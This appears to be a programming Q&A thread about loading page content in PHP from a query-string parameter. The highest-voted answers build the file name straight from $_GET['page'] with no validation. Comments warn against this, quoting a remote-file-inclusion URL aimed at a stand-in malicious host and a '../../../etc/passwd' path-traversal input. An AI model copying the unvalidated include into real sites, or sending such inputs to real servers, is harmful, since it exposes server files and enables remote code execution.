# Execute PHP on clicking a link

Tags: php, html, include, hyperlink

My website's pages are (or will) all be identical, except for the content of the #main div. So I was thinking in the <head> I could do `<?php $page = "home.html"?>`, where home.html is the bare contents (not a full html page - no <html>, <head> etc.) of the main div for the home page. So then inside <div id="main"> and </div> I could have `<?php include($page);?>`. Then the reason I'm asking this question is I want to change $page when a link is clicked. How can I do this? Thanks.

Comment: Just be careful with this approach - it could allow a malicious user to include arbitrary files from your server! Check the value of $_GET['page'] against a whitelist of allowed files or paths.

Comment: No it can't, becaue I prepend the pages/ path, so it will either be a page in there or invalid, and I append .html, so It can only be html files.

Comment: Not so... think about this query-
index.php?page=http://malicoussite.com/attack.php?
(would include http://malicoussite.com/attack.php?.html and run the script.)
I've run a function that strips out all non-alphabetical characters so the trick of perpending a past directory can't be done.
Includes present many security verunabilities, try using file_get_contents instead.

Comment: Ok, I'm using the get contents now instead, and removing non alphanumerical characters. So comparing against a whitelist like dcaunt said isn't necessary, right?

Answer (score 3, accepted):

You could make the links be like this:

```
<a href="mypage.php?page=other_page">Other Page</a>
```

Then also in the top of the page where you set `page` to the value of `$_GET['page']`

```
<?php
  if (isset($_GET['page']))
  {
    $page = $_GET['page'] . ".html";
  } else {
    $page = "home.html";
  }
?>
```

Comment: don't forget to check if `$_GET['page']` is valid. Someone could easily force your script to include files in other directories if you don't check.

Comment: No, because all they can specify is the file name. I prepend my pages/ directory and append the .html file extension.

Comment: I also found that linking to index?page=home works the same, without the .php extension, so I'm using that.

Comment: Beware of file path injection. An attacker can easily subvert your system using index?page=../../../etc/passwd

Comment: No, I remove all non alphanumerical characters.

Answer (score 1):

Your link has to be like:

```
home.php?page=test
```

You will get the value in your page variable like this:

```
if(isset($_GET['page']))
  $page = $_GET['page'].'.html';
else
  $page = 'index.html';
```

Comment: Actually its index.php. So what does $_GET return if there is no 'page'? Because I'd have to set it to 'home.html' if there is none.

Comment: In this case, $_GET['page'] returns test.

Comment: If $_GET['page'] isn't set, the else loop will set $page to index.html

Answer (score 0):

You can do something like:
http://yoursite.com/index.php?page=test.html or http://yoursite.com/index.php?page=test (and append .html later).

For instance:

```
<?php $page = preg_replace('/[^A-Za-z]/','', $_GET['page']);
$path = 'pages/'.$page.'.html'
if (file_exists($path)){ $output = file_get_contents($path); }
 else { header("HTTP/1.0 404 Not Found");
 $output = file_get_contents('pages/404.html'); }
?>
```

(Putting the rest of your file after the php, for the 404 header to work.)

Then, you also can use apache rewrites:

```
Rewrite Engine On
Rewrite Rule ^([A-Za-z]+)$ index.php?page=$1
```

Then use links like http://mysite.com/page_name

Then in the main div:

```
<?php echo $output; ?>
```

Comment: Could you explain a bit more about the rewriting and what it does?

Comment: Is there any advantage to using file_get_contents over include() 'ing it?

Comment: Normally apache serves files from the webroot (/htdocs etc.), and sets all the different files.
Rewriting intercepts these requests and if they match a regular expression, it silently reroutes these requests to another file.
This way, the url can be http://mysite.com/mypage but access http://mysite.com/index.php?page=mypage for cleaner, easier to write and remember urls, it also allows you to virtually change the .html extension, or even get rid of it.
Using file_get_contents is a security feature. It doesn't execute any php it finds in the file, so malicious and rouge php can't be executed.

Comment: So how can I rewrite index?page=error, index?page=downloads to /error, /downloads? Specifically, where do I place that Rewrite code?